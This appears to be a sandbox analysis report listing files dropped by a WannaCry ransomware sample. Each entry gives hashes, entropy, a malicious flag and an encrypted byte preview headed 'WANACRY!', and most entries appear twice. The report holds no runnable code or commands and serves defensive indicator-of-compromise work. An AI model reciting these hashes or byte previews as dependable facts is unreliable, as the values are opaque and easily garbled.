                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):329976
                                                                                      Entropy (8bit):7.9994749709468085
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:G0h0upFViemqRQ+9fbOyV4o0W9zuKec6yzvlHLk+ilyAzB8oGFnjiiiLGq8zKV:xquMIQ+9TPGlWlb/yNYiLJV
                                                                                      MD5:75B099D0DF776113FAE8CE0D15232050
                                                                                      SHA1:174DE9F55FA5881C5610764C693B491969AEF1C9
                                                                                      SHA-256:3D0DC6436176A9C1FE229175E6D0DE22F2CD86263C1FC881B6212D226C447B1C
                                                                                      SHA-512:DE4976374F1E3EB7A900AE3FECEAD3AE52A90E7685B0698292762A33625A48DFD9326E32B6F6E274BFB2324D05DCC284853C47594BA22A62B1C4D9B474BE8444
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....-..P\.B...?.&>v....k..+.\K..=e..?DT..L......b.S.#k.p\.B.fE... .....s...y.P.g.<..py.+Yt.>....h..#D].2.....R,@..$x...n.D.J.~.E...RY.t.8.K...+.. ..)..x..=a~.C..U.-...[.X.!b.?..?].B..hN.. .0..-u.....f.p...].P..gz#P9.N..Y.g...z.)...^.|`d.......R6&..................X....2..n._...g..B.....#K5..lc.*..z.F...4*...~_b4.3x~.......2Dq<.;.'r.....J.....;.....|%...Q..@.',.....I.5...Yu...Xp.1.?...J.....z.1.v.N3..s..M C.j.*pe....b.L3.,..2.....i+g....YeJa.9v/l.\.q...a. 1V.I...3..._.5.....D....l.n......q.v....4..b7....ll....4.O..9....j......x....H,....o...>!ez..T....m{.r..y.%:m.w..>.........-Sl.I.G....c.88.44.....{.u...E..!..z/B...KiBb.w._`.f..c.P....0..b..Y...{.4..7.6.2a^.#.vI.~......kY.E.z$..=.K .x.<o...^YK.6.....!.)..B...\(.....d*z.a..^.v49.....b..C.`I.....X...#1e)...A...<....|...p.6B.{.F".`..DY...#.ZG6....L..W.QN.T...^.Q...P>.........|u..._.1.H..^...q.F,...a....-..HG(......O...:Py...^.;...%..Q}M.....GF.0m}U.....>4.H..~.S...9.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):329976
                                                                                      Entropy (8bit):7.9994749709468085
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:G0h0upFViemqRQ+9fbOyV4o0W9zuKec6yzvlHLk+ilyAzB8oGFnjiiiLGq8zKV:xquMIQ+9TPGlWlb/yNYiLJV
                                                                                      MD5:75B099D0DF776113FAE8CE0D15232050
                                                                                      SHA1:174DE9F55FA5881C5610764C693B491969AEF1C9
                                                                                      SHA-256:3D0DC6436176A9C1FE229175E6D0DE22F2CD86263C1FC881B6212D226C447B1C
                                                                                      SHA-512:DE4976374F1E3EB7A900AE3FECEAD3AE52A90E7685B0698292762A33625A48DFD9326E32B6F6E274BFB2324D05DCC284853C47594BA22A62B1C4D9B474BE8444
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....-..P\.B...?.&>v....k..+.\K..=e..?DT..L......b.S.#k.p\.B.fE... .....s...y.P.g.<..py.+Yt.>....h..#D].2.....R,@..$x...n.D.J.~.E...RY.t.8.K...+.. ..)..x..=a~.C..U.-...[.X.!b.?..?].B..hN.. .0..-u.....f.p...].P..gz#P9.N..Y.g...z.)...^.|`d.......R6&..................X....2..n._...g..B.....#K5..lc.*..z.F...4*...~_b4.3x~.......2Dq<.;.'r.....J.....;.....|%...Q..@.',.....I.5...Yu...Xp.1.?...J.....z.1.v.N3..s..M C.j.*pe....b.L3.,..2.....i+g....YeJa.9v/l.\.q...a. 1V.I...3..._.5.....D....l.n......q.v....4..b7....ll....4.O..9....j......x....H,....o...>!ez..T....m{.r..y.%:m.w..>.........-Sl.I.G....c.88.44.....{.u...E..!..z/B...KiBb.w._`.f..c.P....0..b..Y...{.4..7.6.2a^.#.vI.~......kY.E.z$..=.K .x.<o...^YK.6.....!.)..B...\(.....d*z.a..^.v49.....b..C.`I.....X...#1e)...A...<....|...p.6B.{.F".`..DY...#.ZG6....L..W.QN.T...^.Q...P>.........|u..._.1.H..^...q.F,...a....-..HG(......O...:Py...^.;...%..Q}M.....GF.0m}U.....>4.H..~.S...9.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1608
                                                                                      Entropy (8bit):7.871245399924356
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkDOIJC1Dc77oZWaNUKQQGuUqbkDo0xdCpCex:oDHX78WO4X4kDTxdcr
                                                                                      MD5:3E6D8F1AA67EEB04955F0756E2848EC1
                                                                                      SHA1:F408D9321A008E38EBF2EDB3083B4D31991AE22D
                                                                                      SHA-256:F260D9E8C7A26096B2429A7528893C481F308D64752E59DBE573893BE5656A68
                                                                                      SHA-512:C10F6D6B20F6E4EDB7A71DA866A04614794BCB92FE158544C2D3C310AE348EC062D38A7A9BCF402EBCFF5AEDBC12FD196DF6B32D8688C5D3B3E549DAA3613859
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......ew.o........D.n.....!?.`e....r>.^..x..H@.@.]a>.K...@..h.U...`.`.FAn...N...r...?J...5.wJ....4..WqY..[.......T.%..o..Au..aG..D..t..;...R_....5../..NqE....C...H.I....k..S.o.9 ....G.,m=.L..<...p.Tn!oHwK...r..4'....tl6{..?;=r.....S.j..Z.:...b{.e.....%.........0.g....oATb.M.}..KyP.....].<.3.....}../.... .I.:25!X1m[...f..s<.6.a.....Neo.z.(L..v.~."Q..DW..(...n.......j...;5)@Y.>K.\..@.h?...3....V..i...p...O........V..s...{|.....2m.L.4.kT$..4..f...U...:`...6/....q.`Y.F#-..-.F....hg..O.O..({..T...'-..].?.0.g......_T..(...m.2.....F.1..\+.rYG..>.5.<.9[...<~..d.t] .I....&.\..u.O...F......"..6)\.C.=.0.c....s&[.e...}...0.....#..Y.O...(~0x.....z.s....yb4..H...\24...9.../|d*.....C...=.lu.2L=.f......<m.|...<&wR...y.....i.......9..;$p...Z.G...P..[..3.C....Fgv!a.^..&H..6$.V.:..L-...../...J...;XG.U...Io.D7.f....2.9s/..%p..WnQk;.wa.0.B. ...cK.pQ...*sqz.z...c.&.FW.;......"VU...a..i..`k_.}........r1....9X.....p7..7..H..X2.k.'=..w.5)S.@z..h.g
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1608
                                                                                      Entropy (8bit):7.871245399924356
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkDOIJC1Dc77oZWaNUKQQGuUqbkDo0xdCpCex:oDHX78WO4X4kDTxdcr
                                                                                      MD5:3E6D8F1AA67EEB04955F0756E2848EC1
                                                                                      SHA1:F408D9321A008E38EBF2EDB3083B4D31991AE22D
                                                                                      SHA-256:F260D9E8C7A26096B2429A7528893C481F308D64752E59DBE573893BE5656A68
                                                                                      SHA-512:C10F6D6B20F6E4EDB7A71DA866A04614794BCB92FE158544C2D3C310AE348EC062D38A7A9BCF402EBCFF5AEDBC12FD196DF6B32D8688C5D3B3E549DAA3613859
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......ew.o........D.n.....!?.`e....r>.^..x..H@.@.]a>.K...@..h.U...`.`.FAn...N...r...?J...5.wJ....4..WqY..[.......T.%..o..Au..aG..D..t..;...R_....5../..NqE....C...H.I....k..S.o.9 ....G.,m=.L..<...p.Tn!oHwK...r..4'....tl6{..?;=r.....S.j..Z.:...b{.e.....%.........0.g....oATb.M.}..KyP.....].<.3.....}../.... .I.:25!X1m[...f..s<.6.a.....Neo.z.(L..v.~."Q..DW..(...n.......j...;5)@Y.>K.\..@.h?...3....V..i...p...O........V..s...{|.....2m.L.4.kT$..4..f...U...:`...6/....q.`Y.F#-..-.F....hg..O.O..({..T...'-..].?.0.g......_T..(...m.2.....F.1..\+.rYG..>.5.<.9[...<~..d.t] .I....&.\..u.O...F......"..6)\.C.=.0.c....s&[.e...}...0.....#..Y.O...(~0x.....z.s....yb4..H...\24...9.../|d*.....C...=.lu.2L=.f......<m.|...<&wR...y.....i.......9..;$p...Z.G...P..[..3.C....Fgv!a.^..&H..6$.V.:..L-...../...J...;XG.U...Io.D7.f....2.9s/..%p..WnQk;.wa.0.B. ...cK.pQ...*sqz.z...c.&.FW.;......"VU...a..i..`k_.}........r1....9X.....p7..7..H..X2.k.'=..w.5)S.@z..h.g
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):552536
                                                                                      Entropy (8bit):7.999599347135692
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:V3iWdMrFygWJTLlS837dJNCSD8OPhAqCp4baWknzBDm5B9uO:V3iWWTWJk8rfNHpPhAqCps3knzBa5B9D
                                                                                      MD5:19A4A65EDCF1C78CC4130796F8715211
                                                                                      SHA1:1897E9C7E8C1FD22FC377668718567951C01B2BC
                                                                                      SHA-256:48F0577EF83602E94AFDAFF026F6C5AE0CC0037B4F5807FCE21DE67A874E249C
                                                                                      SHA-512:8F327DC6B0CC1C8759BF0F76FDF470CF72E4B91676733A867C8CE30A559E39C5966C7DF1D00C017222C73E0FB0EE9A01CACF8CB7891D85C318E52C586C0E6FF5
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........!....=.T!--L$H....Q..h....b...t...^.x3%=.....8.pd....._.2@.,...K@....Doy........X...$.a..6.g..........eFD......h...3M.`...y.;..i.........LL..M..V"....or.]=3.;.*Is..I..w...%U..+..tFU..=.Q.S.@..o....\..e...A.T..p.XZ"....(E...X.....^.p.w.....9m.......,.$...]..J.....#..g.>...e..[v..2...7.Z.,....A.J+.rJ...OO...3........Z`Ha.N..#.s.......=....."...r.-iII..._.....%.j}...q...B...3.......$....,m.|rP ......A...,m.A....h....G 7..3 .AD.-.K.h.+6..kz5`..c,R.P..fv.. ..b....lu.P .qH...l.U..k.%.H.X.......2.v**&S0<Y;.y..\J..9.>M.A.+,J........t.....^...\r:.X.U%Ze....k...C.....;....s.sH.....bG.[..U<u.l...m.A........i.l..t=........k...`...H72.....\../=.'.(........~....H..s}..o].hTrJ.W...KA....Z>.).L4.G..<j.$....`nwz.."..9...*..2...A*.w..YD_.....gk.._.V.>..!{7(.......m.ES...Dix..^.S>.......7B.!..&a}T`qt8. .X..17*..){8...&G.y-p*T...P.....D+D..-.`.H.E.~.J.05.......af...~)".C....}.......?..3.r.6....v....;s......mf...e...&..>C..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):552536
                                                                                      Entropy (8bit):7.999599347135692
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:V3iWdMrFygWJTLlS837dJNCSD8OPhAqCp4baWknzBDm5B9uO:V3iWWTWJk8rfNHpPhAqCps3knzBa5B9D
                                                                                      MD5:19A4A65EDCF1C78CC4130796F8715211
                                                                                      SHA1:1897E9C7E8C1FD22FC377668718567951C01B2BC
                                                                                      SHA-256:48F0577EF83602E94AFDAFF026F6C5AE0CC0037B4F5807FCE21DE67A874E249C
                                                                                      SHA-512:8F327DC6B0CC1C8759BF0F76FDF470CF72E4B91676733A867C8CE30A559E39C5966C7DF1D00C017222C73E0FB0EE9A01CACF8CB7891D85C318E52C586C0E6FF5
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........!....=.T!--L$H....Q..h....b...t...^.x3%=.....8.pd....._.2@.,...K@....Doy........X...$.a..6.g..........eFD......h...3M.`...y.;..i.........LL..M..V"....or.]=3.;.*Is..I..w...%U..+..tFU..=.Q.S.@..o....\..e...A.T..p.XZ"....(E...X.....^.p.w.....9m.......,.$...]..J.....#..g.>...e..[v..2...7.Z.,....A.J+.rJ...OO...3........Z`Ha.N..#.s.......=....."...r.-iII..._.....%.j}...q...B...3.......$....,m.|rP ......A...,m.A....h....G 7..3 .AD.-.K.h.+6..kz5`..c,R.P..fv.. ..b....lu.P .qH...l.U..k.%.H.X.......2.v**&S0<Y;.y..\J..9.>M.A.+,J........t.....^...\r:.X.U%Ze....k...C.....;....s.sH.....bG.[..U<u.l...m.A........i.l..t=........k...`...H72.....\../=.'.(........~....H..s}..o].hTrJ.W...KA....Z>.).L4.G..<j.$....`nwz.."..9...*..2...A*.w..YD_.....gk.._.V.>..!{7(.......m.ES...Dix..^.S>.......7B.!..&a}T`qt8. .X..17*..){8...&G.y-p*T...P.....D+D..-.`.H.E.~.J.05.......af...~)".C....}.......?..3.r.6....v....;s......mf...e...&..>C..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):7.265505254700194
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE4XeH+uHGYT7p4shd4TZG902TIthcBiDucmcH3NnsURlCOqs6EBzWHo51XGJ0s:bkE4OJHGYRSTZG9VwhwiycZH3N1RlNdW
                                                                                      MD5:21712A0706DEBF9CC6DA03B1934DD607
                                                                                      SHA1:BC618A61F6E0403239449628CEE52E81CEA39885
                                                                                      SHA-256:B8080BE243F3562A5B7BB68500E88322261A460A00C220BFD3F5951B300EB2CE
                                                                                      SHA-512:BA1E5163BDD50DB3BCDD8154335341256C750E1C0D76DE86F0CEBA69560A2EE28549D4B7FCBA69DBE84E45A1ABD77FFA836A7EBA6C166F3548CF4CCCA0AEC348
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....J..+:.........b...J..m3T.r........./..I....f..."8.R.K.....%....).>.......".....).4.....HN$.. ..c1.4.$...fO..:.D.....Wvx..2.e..+.n...jp3.....t...*.g.z..(^@V..)...S.V..u....6.(I.1...W....}1.....8....@..........J.i..l.....l..E.[P..B?..)Tr.....8<.E<....%.......H!|..Q.=....[.G.2....t..*...n.v..aJS.9D(_[T`
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):7.265505254700194
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE4XeH+uHGYT7p4shd4TZG902TIthcBiDucmcH3NnsURlCOqs6EBzWHo51XGJ0s:bkE4OJHGYRSTZG9VwhwiycZH3N1RlNdW
                                                                                      MD5:21712A0706DEBF9CC6DA03B1934DD607
                                                                                      SHA1:BC618A61F6E0403239449628CEE52E81CEA39885
                                                                                      SHA-256:B8080BE243F3562A5B7BB68500E88322261A460A00C220BFD3F5951B300EB2CE
                                                                                      SHA-512:BA1E5163BDD50DB3BCDD8154335341256C750E1C0D76DE86F0CEBA69560A2EE28549D4B7FCBA69DBE84E45A1ABD77FFA836A7EBA6C166F3548CF4CCCA0AEC348
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....J..+:.........b...J..m3T.r........./..I....f..."8.R.K.....%....).>.......".....).4.....HN$.. ..c1.4.$...fO..:.D.....Wvx..2.e..+.n...jp3.....t...*.g.z..(^@V..)...S.V..u....6.(I.1...W....}1.....8....@..........J.i..l.....l..E.[P..B?..)Tr.....8<.E<....%.......H!|..Q.=....[.G.2....t..*...n.v..aJS.9D(_[T`
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16456
                                                                                      Entropy (8bit):7.987436940600907
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:Hs4u/UrEgKyepZfb7oBI7bfPEdEs8aUssdD:MheEpZptb7ou7bnAtQD
                                                                                      MD5:EE55B197E443FBF4F9EF00EEE164B041
                                                                                      SHA1:4D6322CEAD805200A35D40FCAB0FADF564013FD1
                                                                                      SHA-256:E4B4DB5D5E61117564FF287D296EE428AE1ACCF601487B04F71FCA4A1277A61E
                                                                                      SHA-512:5DCBBF71B700E531B10C66AE35B58E816CA6DFD42C0A60FFCD097917F411EF3D3D93CB7463E9D427C6CCD15B55584B627B2EBD25974848B716D4A352F3F92D57
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....V.8.@q...P.....c..w..*.;..ZF......0..2..;.{.Y......K....-.......2W<.2.@..6%...k....&|..o;e.[.......4u...([..%.<.Q.J."v...w...[U3c.,.6.J...bK....>....C....e.r....3....y...9.P..U.......1;.!........pK...zF.....5.....%m.S...,...F.|+.j&M..ar..Q.......$?.......'#p-....*....Wp.....!..........6}1........T9......i...U..(R.o.A...%..Y@.c'WF2..&..X......!H..g..~.\.Z).2.G.p.n..(.O.n....=.Y.....@..`.X.?.G4S.N...C...+7.......=(W....1.p..v<...;..4..t..P,g.QB....@3...e-/a......|6....qb....HC..Y...../..]..qk_=........D..I.....UDl.MRT.).P^.o...l..V<...|..HP.$..09.%.'.*.1.p.r./:So.P..||P..I.......;nF.-W.oQ.....@.........xM[Uh%.K...R*......UFN.U..`E...|.\..j..~..".?..._....`.HVU...=.(a..)`.ldm.B#.Z..7.tX......5r#.....Rd.}l....?.C.A..(v....?..$J....B..;C....dXW].I,c....mCH...I.8p>(......[=:../.u(..Q^@....m\.|r..qi.>(.....t....s....(;/..J.a.d.)...B7(.....C^.......]#..~.......(}.K...n[..:p....&Y..t~...dm..?.....'ohPX.A.)....t..o..^...:.MM.e..I5....4..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16456
                                                                                      Entropy (8bit):7.987436940600907
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:Hs4u/UrEgKyepZfb7oBI7bfPEdEs8aUssdD:MheEpZptb7ou7bnAtQD
                                                                                      MD5:EE55B197E443FBF4F9EF00EEE164B041
                                                                                      SHA1:4D6322CEAD805200A35D40FCAB0FADF564013FD1
                                                                                      SHA-256:E4B4DB5D5E61117564FF287D296EE428AE1ACCF601487B04F71FCA4A1277A61E
                                                                                      SHA-512:5DCBBF71B700E531B10C66AE35B58E816CA6DFD42C0A60FFCD097917F411EF3D3D93CB7463E9D427C6CCD15B55584B627B2EBD25974848B716D4A352F3F92D57
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....V.8.@q...P.....c..w..*.;..ZF......0..2..;.{.Y......K....-.......2W<.2.@..6%...k....&|..o;e.[.......4u...([..%.<.Q.J."v...w...[U3c.,.6.J...bK....>....C....e.r....3....y...9.P..U.......1;.!........pK...zF.....5.....%m.S...,...F.|+.j&M..ar..Q.......$?.......'#p-....*....Wp.....!..........6}1........T9......i...U..(R.o.A...%..Y@.c'WF2..&..X......!H..g..~.\.Z).2.G.p.n..(.O.n....=.Y.....@..`.X.?.G4S.N...C...+7.......=(W....1.p..v<...;..4..t..P,g.QB....@3...e-/a......|6....qb....HC..Y...../..]..qk_=........D..I.....UDl.MRT.).P^.o...l..V<...|..HP.$..09.%.'.*.1.p.r./:So.P..||P..I.......;nF.-W.oQ.....@.........xM[Uh%.K...R*......UFN.U..`E...|.\..j..~..".?..._....`.HVU...=.(a..)`.ldm.B#.Z..7.tX......5r#.....Rd.}l....?.C.A..(v....?..$J....B..;C....dXW].I,c....mCH...I.8p>(......[=:../.u(..Q^@....m\.|r..qi.>(.....t....s....(;/..J.a.d.)...B7(.....C^.......]#..~.......(}.K...n[..:p....&Y..t~...dm..?.....'ohPX.A.)....t..o..^...:.MM.e..I5....4..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2088
                                                                                      Entropy (8bit):7.9000545653215655
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkUOlq+FDUblk3P1bI6tL/OjedGJYwxV43t+Gtf7/zx:oUZk3NbFqisY8V49+GZd
                                                                                      MD5:032A28B8F5B800FE06601646C1B4B9BA
                                                                                      SHA1:D756AEBA6B9C6B7BBFF362F567E091A826167E96
                                                                                      SHA-256:4D6380CA9A11E89DFB672285CB741A067A887F3246FE04CA7DF5A24E9CAA6DFE
                                                                                      SHA-512:41A0263768A973AC9C0CAF24FCF8AA572FAD6A30785BE355AC9559A2B8DFD7B0A28801F62D5A3126E7292350552D0C201A0EAA58ABEAFD9DDBF580B5922D0BAA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........Px.[n.j....X...).Xi.3)q.T .<M..$J\.1(....d..~.......xc.r.....G2g.....^x..<.*.H.OY...JH8.nf.JV.dg....g..Ta.'.......g....!.t.~...._i.z;.c...........7.W^k.e...i*R)@.B(.K..!.,..@..Q....4.b..y.K.........[U:.J.Y%.G.......Y.......*3.....)..0..............+.)V.l....*.0X.6..w.....}.6.7-.EI....G..w_9.{n.....[48S7...{.Mv-B..M.^..f'.nT=.a..<..o...q...#....4B.t..H..4....r.NE2...%..t.)...TR4..........US;..6...'|.]\.Q.6./._.u.R..............p..B}.|.p.].....D.?f*...6..(E^Hl..)D.N&@.....)).R8GA..Q..[.#.]...]4.o...G?..\c..sk.I.g|gL..\.bo.Q9e...3.1Fa.S.......{.ET.....F..H..V..n..e...r-.t.=...7.[....fd..z...?.m.d...$..nTDZV.X.[.u5l.Ir_....*.wgA#...2.F$km.....Z....8.+.f5..........q~R2.._.K}. :.?../.{.?O...>). ....1d..s..7.c.+).Y.K...z.(u..+zN=,.o...=.?....`....T.^.jQ'..hN.|..>.p...Fl..N.!.....6lY....)...uft.......Q.......5.$..E........-.$......@...|.T.&..^.(.......8u.g;Hek...e.q...D.[...s...!....dW_........=.=..X]..`. ..c.y?._.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2088
                                                                                      Entropy (8bit):7.9000545653215655
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkUOlq+FDUblk3P1bI6tL/OjedGJYwxV43t+Gtf7/zx:oUZk3NbFqisY8V49+GZd
                                                                                      MD5:032A28B8F5B800FE06601646C1B4B9BA
                                                                                      SHA1:D756AEBA6B9C6B7BBFF362F567E091A826167E96
                                                                                      SHA-256:4D6380CA9A11E89DFB672285CB741A067A887F3246FE04CA7DF5A24E9CAA6DFE
                                                                                      SHA-512:41A0263768A973AC9C0CAF24FCF8AA572FAD6A30785BE355AC9559A2B8DFD7B0A28801F62D5A3126E7292350552D0C201A0EAA58ABEAFD9DDBF580B5922D0BAA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........Px.[n.j....X...).Xi.3)q.T .<M..$J\.1(....d..~.......xc.r.....G2g.....^x..<.*.H.OY...JH8.nf.JV.dg....g..Ta.'.......g....!.t.~...._i.z;.c...........7.W^k.e...i*R)@.B(.K..!.,..@..Q....4.b..y.K.........[U:.J.Y%.G.......Y.......*3.....)..0..............+.)V.l....*.0X.6..w.....}.6.7-.EI....G..w_9.{n.....[48S7...{.Mv-B..M.^..f'.nT=.a..<..o...q...#....4B.t..H..4....r.NE2...%..t.)...TR4..........US;..6...'|.]\.Q.6./._.u.R..............p..B}.|.p.].....D.?f*...6..(E^Hl..)D.N&@.....)).R8GA..Q..[.#.]...]4.o...G?..\c..sk.I.g|gL..\.bo.Q9e...3.1Fa.S.......{.ET.....F..H..V..n..e...r-.t.=...7.[....fd..z...?.m.d...$..nTDZV.X.[.u5l.Ir_....*.wgA#...2.F$km.....Z....8.+.f5..........q~R2.._.K}. :.?../.{.?O...>). ....1d..s..7.c.+).Y.K...z.(u..+zN=,.o...=.?....`....T.^.jQ'..hN.|..>.p...Fl..N.!.....6lY....)...uft.......Q.......5.$..E........-.$......@...|.T.&..^.(.......8u.g;Hek...e.q...D.[...s...!....dW_........=.=..X]..`. ..c.y?._.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1394952
                                                                                      Entropy (8bit):7.99986337067168
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:g8B95rMZTR5VsHOOwJabsz6wdz24t/nIjTj2YMS9AHhnxblf8KRRk+8Xbsdhx7T3:giiZTRiOBJabD94hIjTj2YdABxRTx8Xa
                                                                                      MD5:9568AD8405C7F3BEBF389CF12A0D2900
                                                                                      SHA1:2BB9F13CF313A47E2FD26B530F01B83657746FC9
                                                                                      SHA-256:3DB632D7B649544442EDCC18A2E985B920E235F9C73173590D329A2976F6BA71
                                                                                      SHA-512:E155B86CB7F5AA87B1A64CFE397404306CFF65196654564FE3E80DB7D18EBEF997FCCF4941BC122731A1911C4ED2AF2872F7D21A6FF3A96497FE7550A68AF6B2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..............8aT6]..u.D.......C...b..Ai.._..W.....g[A.;....X.....e.#.4..e.P..rmc\...'H...gY.w..........r.5.A...X.c..".T..G9.~=K.....zB.!d11....8%~.....M..-....P.....S..=2..$..r.....D.2...H.@.yI..=......TFq..5...c5..=}.....3R..E..#".a>0n9jC}r@k..c...P.*=.....G.......2H}:......5..+7./.w....f..9}0..L..G.g?*n........=o<Bt..-X...0.b9T.....pA.....j...h<..."i.I._.d.....{.....H...!........8..$6.....s7_..}....,}..3....q}A$!CX)....8:3..D....].h,.....G.....x.?.x..G....#~./.6....[,.41xW...KE5.v......'.....n.z.....`=ns..F.{...H....~....2Q.C1...9.......$n.[.m...{.~\/o....m...uj.......B..F.duT....+.k0.j...D.m.`....W*'..L+0.....w"W.../......"#...."cT1..A..h.`.N.;.?...>0p..8sZ)+...U.o..U......9._....0.8.eQt..!0Cw./V...w....gf...(.6>.jj...,.&.H....We.....y.U,X.........P...9..$...e)'7..-t...$.t......)kJ..?d..n........R.].Z-.P.6..k.Z.X.....w;....`3....>....s.9...6<t[..<....."...If.^...*-....d.k8cB?...@ji.jMm...<..j...q..I...zE....G.v..{....$.|...).B.z.]D.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1394952
                                                                                      Entropy (8bit):7.99986337067168
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:g8B95rMZTR5VsHOOwJabsz6wdz24t/nIjTj2YMS9AHhnxblf8KRRk+8Xbsdhx7T3:giiZTRiOBJabD94hIjTj2YdABxRTx8Xa
                                                                                      MD5:9568AD8405C7F3BEBF389CF12A0D2900
                                                                                      SHA1:2BB9F13CF313A47E2FD26B530F01B83657746FC9
                                                                                      SHA-256:3DB632D7B649544442EDCC18A2E985B920E235F9C73173590D329A2976F6BA71
                                                                                      SHA-512:E155B86CB7F5AA87B1A64CFE397404306CFF65196654564FE3E80DB7D18EBEF997FCCF4941BC122731A1911C4ED2AF2872F7D21A6FF3A96497FE7550A68AF6B2
                                                                                      Malicious:true
                                                                                      Reputation:low
